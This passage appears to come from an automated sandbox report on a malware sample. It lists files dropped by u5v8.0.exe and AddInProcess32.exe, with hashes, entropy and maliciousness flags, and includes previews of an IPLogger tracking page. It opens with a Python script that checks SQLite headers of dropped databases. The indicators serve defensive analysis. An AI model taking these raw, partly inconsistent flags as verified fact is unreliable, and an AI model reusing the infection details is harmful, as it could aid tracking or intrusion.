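TEXT_ENCODINGS = {1: "UTF-8", 2: "UTF-16le", 3: "UTF-16be"}


def parse_sqlite_header(data: bytes) -> dict:
    """Decode the 100-byte SQLite 3 file header. All multi-byte fields are big-endian."""
    if len(data) < 100:
        raise ValueError("need at least the 100-byte header")
    if data[:16] != SQLITE_MAGIC:
        raise ValueError("not an SQLite 3 database (bad magic)")
    page_size = struct.unpack_from(">H", data, 16)[0]
    if page_size == 1:  # the value 1 encodes a 65536-byte page
        page_size = 65536
    # Twelve 4-byte fields at offsets 24..72, in file-format order.
    (change_counter, n_pages, _freelist_trunk, freelist_count,
     schema_cookie, schema_format, _cache_size, _largest_root,
     text_encoding, user_version, _incr_vacuum, app_id) = struct.unpack_from(">12I", data, 24)
    version_valid_for, sqlite_version = struct.unpack_from(">II", data, 92)
    return {
        "page_size": page_size,
        "change_counter": change_counter,   # libmagic prints this as "file counter"
        "n_pages": n_pages,
        "freelist_pages": freelist_count,
        "schema_cookie": schema_cookie,
        "schema_format": schema_format,
        "text_encoding": TEXT_ENCODINGS.get(text_encoding, f"unknown({text_encoding})"),
        "user_version": user_version,
        "application_id": app_id,
        "version_valid_for": version_valid_for,
        "sqlite_version": sqlite_version,   # SQLITE_VERSION_NUMBER, 3042000 == 3.42.0
    }


def summarize(hdr: dict) -> str:
    """Render the header in the same style as the File Type column above."""
    return (f"SQLite 3.x database, last written using SQLite version {hdr['sqlite_version']}, "
            f"page size {hdr['page_size']}, file counter {hdr['change_counter']}, "
            f"database pages {hdr['n_pages']}, cookie {hdr['schema_cookie']:#x}, "
            f"schema {hdr['schema_format']}, {hdr['text_encoding']}, "
            f"version-valid-for {hdr['version_valid_for']}")


def size_consistent(hdr: dict, file_size: int) -> bool:
    """True when the on-disk size equals page_size * n_pages.

    The in-header page count is only trustworthy when version-valid-for equals
    the change counter (older SQLite writers did not maintain the count), so a
    stale count is reported as inconsistent rather than trusted.
    """
    if hdr["version_valid_for"] != hdr["change_counter"]:
        return False
    return file_size == hdr["page_size"] * hdr["n_pages"]


def build_header(page_size, change_counter, n_pages, schema_cookie,
                 schema_format, text_encoding, version_valid_for, sqlite_version) -> bytes:
    """Constructed test header (not bytes from the sample), laid out per the file format."""
    hdr = bytearray(100)
    hdr[:16] = SQLITE_MAGIC
    struct.pack_into(">H", hdr, 16, 1 if page_size == 65536 else page_size)
    hdr[18] = hdr[19] = 1                    # write/read format 1 = rollback journal
    hdr[21], hdr[22], hdr[23] = 64, 32, 32   # payload fractions fixed by the format
    struct.pack_into(">IIII", hdr, 24, change_counter, n_pages, 0, 0)
    struct.pack_into(">II", hdr, 40, schema_cookie, schema_format)
    struct.pack_into(">I", hdr, 56, text_encoding)
    struct.pack_into(">II", hdr, 92, version_valid_for, sqlite_version)
    return bytes(hdr)


# Constructed to match the 51200-byte dropped database listed above.
SAMPLE_HEADER = build_header(2048, 1, 25, 0xE, 4, 1, 1, 3042000)
SAMPLE_FILE_SIZE = 51200

if __name__ == "__main__":
    h = parse_sqlite_header(SAMPLE_HEADER)
    print(summarize(h))
    print("size consistent:", size_consistent(h, SAMPLE_FILE_SIZE))
```

Run against a real drop by reading its first 100 bytes and passing the file's length to size_consistent; the two 2048-page-size databases in this listing (51200 and 106496 bytes) both divide exactly by their declared page counts (25 and 52), which is what an unmodified copy of a live database looks like.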
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\u5v8.0.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.704010251295094
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:/j/sfpWFBIirMexXYVw/K9dKAkzFeHx1x21g4kug4c7xy:/j/vBDZxXYVw/KXjHx/4kuUxy
                                                                                                                                                                                                                                MD5:DF05C5F93419C56BFE3A84BDCC929382
                                                                                                                                                                                                                                SHA1:36AABBCD46C0F368E18FA602E486816D2578F48E
                                                                                                                                                                                                                                SHA-256:F7116531006BD0A5DEE64436C66CE5487C662F72BFBCD235C7407FBF2A3278DE
                                                                                                                                                                                                                                SHA-512:EB50E34AA5EE92A7C90AA5BCE11F0693AFAC73C26B04AF9C676E15A24813C52EAF09A4EA3F6490223CABCDB3EB6277E74CB6FF288D3D1871F14B410E950656BA
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\u5v8.0.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.704010251295094
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:/j/sfpWFBIirMexXYVw/K9dKAkzFeHx1x21g4kug4c7xy:/j/vBDZxXYVw/KXjHx/4kuUxy
                                                                                                                                                                                                                                MD5:DF05C5F93419C56BFE3A84BDCC929382
                                                                                                                                                                                                                                SHA1:36AABBCD46C0F368E18FA602E486816D2578F48E
                                                                                                                                                                                                                                SHA-256:F7116531006BD0A5DEE64436C66CE5487C662F72BFBCD235C7407FBF2A3278DE
                                                                                                                                                                                                                                SHA-512:EB50E34AA5EE92A7C90AA5BCE11F0693AFAC73C26B04AF9C676E15A24813C52EAF09A4EA3F6490223CABCDB3EB6277E74CB6FF288D3D1871F14B410E950656BA
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\u5v8.0.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.692704155467908
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:zrCxfe2LWgi+vQ2TVmOkCRMqftTB+IkHJMBxmT+gmPrwxYu:zSLpN5mOhMq1NUHCLm0Mx/
                                                                                                                                                                                                                                MD5:D0B81B6D51E4EDDB3769BCE2A5F1538F
                                                                                                                                                                                                                                SHA1:08D04E7E91BD584CC92DB2586E3752A6E50FF2A7
                                                                                                                                                                                                                                SHA-256:18CE24DD08DD5F5AC0F5CECA3D6551DFDBBD4893A4A9A9A9331E8ADB67061A33
                                                                                                                                                                                                                                SHA-512:CB9E881EE3E57B79597C4AD35D24CBF490882CAB222FD687E52B01798E643876D97A51BE67CBB9AC8CD21EAEC8383FF822569E8E523B165607D328FC53E97B80
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:NEBFQQYWPSTEXBZIDUTTATZZTFWRABRJBLLCZYJOVRXHUMPDHEGQDWTHPNRIJXJXBUSQEVJKULMLPCAPCSHFUPDJCEAANNYOFDUHLLLHOVFNKNTRVWZEFIUBXRXIMRWXDPWVTFKQMGYNRABMTANRGGSLGEIOAUBQFQTLCZWMEHWOZIIQMRJLAHLXPXNJVCGLENXDTBFKZKJLYBJRCHNDCSDKFOXIBOZTNXJYAJRSBBQPGAKTHVHMQLXYQGBGJEKXNNJBZRONCQRXSXGBODHFEHXLSDNKZKOYGQWTAWCYFZWCAASDECKZAPFZVLHUZNKAOEOFXYACNHCKLJCQBGVLWGGJAXFSREDNBXZVKQXDJSDSXQALVYBQAWFRFADSUOUAJLGHBNXRJZTADMFYSWTEEFNLTNZQFEUIHOMLHDFXIINXAWFLMBVWLQALRTVDAZZJLUPLSSAEVUHCENQHZDZHUFSLZAWTBWUIZXADMDJFNIGCMGZAUDXHJYRRCZLEWREZLOERQDDSEKREDPHBBKIUIEJMDLPLKXBZACMCVBOXPIUSWSAYGLJYPERFESVJDFDUCRRMCERYFAOHUKEWBRHIXVALIOBSUZIVKQJYQBYWWQBTQFSMFCMHHJGZWZAIAVHBXGYJSOQFKNTZPVJPXHVDUHZBGDUQFSTVAISEPGJPRFXXECIDSLUEKKGYCYYRYPCKPELJNUUBXKUPANFFQZXZCHJZGUXECSVNTCLQWVYUIUXXUHBVRWGMIPLLBTOOJWGEFGIBSTEOEUCIBZTYLFTDGDCLFGIIEJZNJQROHSUVDJWKISAIRTACFAGNSREZROONUNTUTBQDAEWKYIKLSDTXHQQYMOCADIFSSOJPAJKIYLOJZORJLSPXKKVUAEDRRGACWHBZIGNBZSFLRWHTOKEKQVLZFXTYGAOTMFRKSVLKIISUBYUBNXKHYRNKANSRGPAEMLRECJWZZUGCQATTLPPBVLBJPOLHBERJWQJMJGFN
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\u5v8.0.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.70435191336402
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:q83Oua2II99Dm5Xcf7kmp5fFjUTZF/+akoYY9fBpCtJ6Wi5v:7OD2ISi5Xcz9l8RkcFCJ6Wix
                                                                                                                                                                                                                                MD5:8C1F71001ABC7FCE68B3F15299553CE7
                                                                                                                                                                                                                                SHA1:382285FB69081EB79C936BC4E1BFFC9D4697D881
                                                                                                                                                                                                                                SHA-256:DCC1D5A624022EFCE4D4A919041C499622A1213FD62B848C36E6252EE29B5CAE
                                                                                                                                                                                                                                SHA-512:8F2124445F7856BFFBB3E7067135CFA70BFB657F8CEAEE89312CF15CFA127CACF28C2F1F9CD1CC64E56A8D8C248E237F2E97F968D244C457AD95D0AD5144E2A7
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\u5v8.0.exe
File Type:PSA archive data
Category:dropped
Size (bytes):1026
Entropy (8bit):4.698960923923406
Encrypted:false
SSDEEP:24:mGnbK2uIv9xuPtDhsIChdpYx5eCmVRCqmDCL4yq/6jv:fpuVKIChHYve9RC2LpEK
MD5:186B4E00711974F7AF578BD6FF959BBF
SHA1:642B794D73FB09655FBFF8EDCAAA267634554569
SHA-256:2505B69640298D08BF2DC435A6D289C1FE7ABB349D2017F63EAD8CD2C94199EF
SHA-512:DD6260B7AF96C7449D3DB4826888F7EAD8F274F9E170E103D588B0AB00A044B5978544A10F7B3C0C8464B74FD10B087C5671177AC1468D7F172DF4E7644A336E
Malicious:false
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\u5v8.0.exe
File Type:ASCII text, with very long lines (1024), with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.696312162983912
Encrypted:false
SSDEEP:24:G1O/dOdJXH3hrdB2Swsk4go3oInr8X513aQRmy8:Gk/8ASwsk4+p13aQRmy8
MD5:83B91EFB8185C5AF5A6B60F4FE9CC2D2
SHA1:0EB7AE1817790DFC5225A02B74A272C84FEE4240
SHA-256:8CA340B024C5A3134DE6C89C30C866FF4BCE5175C9E1A2F52075C0199BA1AE1E
SHA-512:F8445B5F18C9F48EFB98B6A310CD757314DA5173FD3490357672B51FED3FF72FF5095E0D17C829D96DE873FC70358D25B7D6369D3458E3AD9BF8D81A5158E46A
Malicious:false
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\u5v8.0.exe
File Type:ASCII text, with very long lines (1024), with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.697336881644685
Encrypted:false
SSDEEP:24:DVE9Jf1tiezZxapTBz4fmlhQHdwc6WS/ZCGxruwyJM:Deu8xafWWKHj6Zx
MD5:08AF516B9E451DB9845289801A21F1BC
SHA1:D43E58D334ACFAE831AD929003D89DC6D3B499F9
SHA-256:C459EA8FCABD26C75606F78F91AA8446698D90422EE4869ABE4ABCCB50B45379
SHA-512:C8C2BB634740DBDDC5928E5FD3960011BB86842B72673FDCE2D65C86AE6D5945F0C88E81AE96DEA711CC654FAC8B4EC809DF18F57BFB4129503DE37E426CF055
Malicious:false
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\u5v8.0.exe
File Type:ASCII text, with very long lines (1024), with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.688284131239007
Encrypted:false
SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
MD5:E8ACCA0F46CBA97FE289855535184C72
SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
Malicious:false
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\u5v8.0.exe
File Type:ASCII text, with very long lines (1024), with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.69156792375111
Encrypted:false
SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:false
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\u5v8.0.exe
File Type:ASCII text, with very long lines (1024), with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.6959554225029665
Encrypted:false
SSDEEP:24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
MD5:DCABA2748DFEAEF0BFBC56FD9F79315C
SHA1:B87FBA690A774893B22B9F611DFDCB5CDC520269
SHA-256:86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
SHA-512:65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
Malicious:false
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\u5v8.0.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):685392
Entropy (8bit):6.872871740790978
Encrypted:false
SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:550686C0EE48C386DFCB40199BD076AC
SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\u5v8.0.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):608080
Entropy (8bit):6.833616094889818
Encrypted:false
SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\u5v8.0.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):450024
Entropy (8bit):6.673992339875127
Encrypted:false
SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:5FF1FCA37C466D6723EC67BE93B51442
SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\u5v8.0.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):2046288
Entropy (8bit):6.787733948558952
Encrypted:false
SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\u5v8.0.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):257872
Entropy (8bit):6.727482641240852
Encrypted:false
SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:4E52D739C324DB8225BD9AB2695F262F
SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\u5v8.0.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):80880
Entropy (8bit):6.920480786566406
Encrypted:false
SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:A37EE36B536409056A86F50E67777DD7
SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):5387648
Entropy (8bit):6.884110511290614
Encrypted:false
SSDEEP:98304:U0NF76666666666666666666666666666666x666666666666666fwwwwwwwwww1:LPMki6zio75L3pf3dedO4keCIwkoYbgV
MD5:40E88D7AC83BDD7C3CBCD6450BCCBC96
SHA1:945EED19A3B608C62B8D9049B1CDFC9C1DFA9DA7
SHA-256:E5013050AFE1A21A6F1D93A9993E36B66DF5ADE527E410A205E4352D280427BA
SHA-512:CA4A0F78957C4A9158CA272FA14B0CE074E6CCFD6812A089BB3E83646A86AFF32D12D4DEF7201EA80088A1BD0E5659B0D03C7C90F791D0A72DBDAA06173A1188
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....S"f.........."......Z....M.....|*............@..........................`R.......R...@.....................................P........yL...........R..+... R..7..`...............................8q...............................................text....X.......Z.................. ..`.rdata.......p.......^..............@..@.data....4...P.......8..............@....tls.................V..............@....rsrc....yL......zL..X..............@..@.reloc...7... R..8....Q.............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):473089
                                                                                                                                                                                                                                Entropy (8bit):7.146087505769809
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:XCcFidBDVC3puEQ482NKwo1Qdv4cGLt5hEMSIBaKqbIE4:XCcFidBDs3pGJwiQdv4cGXboEE4
                                                                                                                                                                                                                                MD5:CCEE6D525CB5940F123C86DB6EDD40DA
                                                                                                                                                                                                                                SHA1:6D17CB82E8C53E726B440CCFD0B179B70CC74FAD
                                                                                                                                                                                                                                SHA-256:CAF653628C3B248D6B9690FE887533E41C8EB03B859CB92EF6C1683D0CAB7CDB
                                                                                                                                                                                                                                SHA-512:916D3D964DC4803CBC5A1DA85BA47ABAF8F95A5609936BE5B4442CF3AE6C896B3C82A7B600DC231A4B5B958900899577F960165EE4FC722A46F6D698788FB940
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L...x.%d.....................Z......O?............@..........................p..................................................P.......E...............................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data...............................@....rsrc...E...........................@..@................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):5387648
Entropy (8bit):6.884110719809745
Encrypted:false
SSDEEP:98304:p0NF76666666666666666666666666666666x666666666666666fwwwwwwwwww9:8PMki6zio75L3pf3dedO4keCIwkoYbgd
MD5:4A0CDEE2B2F1A5B731876005B2366EA8
SHA1:7F08411C51C285250FD0D26D0957725C7AC2E7B6
SHA-256:258DECB49C4EBC7F295BF24A8FEA30A9555449906A8C97164EA8E37014A68D2B
SHA-512:66E455537D5D291D746A0875C9BF38B5DAB9F200AFA9B22B97C631D5D81AF94B850849388FE67BD0F7CC16894B73A3D53D7813B1472DDFBF375954E3F4A60113
Malicious:true
Reputation:unknown
Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....S"f.........."......Z....M.....|*............@..........................`R.....".R...@.....................................P........yL...........R..+... R..7..`...............................8q...............................................text....X.......Z.................. ..`.rdata.......p.......^..............@..@.data....4...P.......8..............@....tls.................V..............@....rsrc....yL......zL..X..............@..@.reloc...7... R..8....Q.............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):5387648
Entropy (8bit):6.884109464357738
Encrypted:false
SSDEEP:98304:+0NF76666666666666666666666666666666x666666666666666fwwwwwwwwwwU:FPMki6zio75L3pf3dedO4keCIwkoYbg0
MD5:0516BFB6D3E6E57D6DD66D1416A93712
SHA1:518E6149AA2FE441F0CC9D780DCBCD43C9B1EE91
SHA-256:A71EAA7C53B1E1DBA6FCE103B5805525BCD0257562DA4610D56918926C11EBDA
SHA-512:E080A764660F15135F80A5BF93BC0A54D22DFBB086791FAB3FB380C66846366ED7A2027C4BE7CF64EC14774E139D2EB45086F533D02960472253C2D7225D7D3C
Malicious:true
Reputation:unknown
Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....S"f.........."......Z....M.....|*............@..........................`R.......R...@.....................................P........yL...........R..+... R..7..`...............................8q...............................................text....X.......Z.................. ..`.rdata.......p.......^..............@..@.data....4...P.......8..............@....tls.................V..............@....rsrc....yL......zL..X..............@..@.reloc...7... R..8....Q.............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:dropped
Size (bytes):7446
Entropy (8bit):5.422209848736349
Encrypted:false
SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
MD5:5B423612B36CDE7F2745455C5DD82577
SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
Malicious:false
Reputation:unknown
Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:dropped
Size (bytes):7446
Entropy (8bit):5.422209848736349
Encrypted:false
SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
MD5:5B423612B36CDE7F2745455C5DD82577
SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
Malicious:false
Reputation:unknown
Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:MS-DOS executable PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows, MZ for MS-DOS
Category:dropped
Size (bytes):4407808
Entropy (8bit):7.9915034437777726
Encrypted:true
SSDEEP:98304:e58vmrQB/A24LDjFO07zDJHBSswWbdIM9F4AoP829ni+tiCCb:e5IB/A241ttEkIO4AoU2ZvnCb
MD5:3953BBAD77CDCB9D5AF2694EED7E6688
SHA1:F965B69EB36D1FBDFB7DFA8C26BA959F395B3223
SHA-256:62206E7CB02B4FE03C535AA4DAAECFA46B42DBD28A756471E50784B7622CECAF
SHA-512:94A5033EDE92683E063829C5A8F2D720C919D1320BF4DB18CC9A2E2A69387530B4AFACC73CF987695A01C09ACBA1169EEA77A0FF269B41698147CD64E64A7D38
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 16%
Reputation:unknown
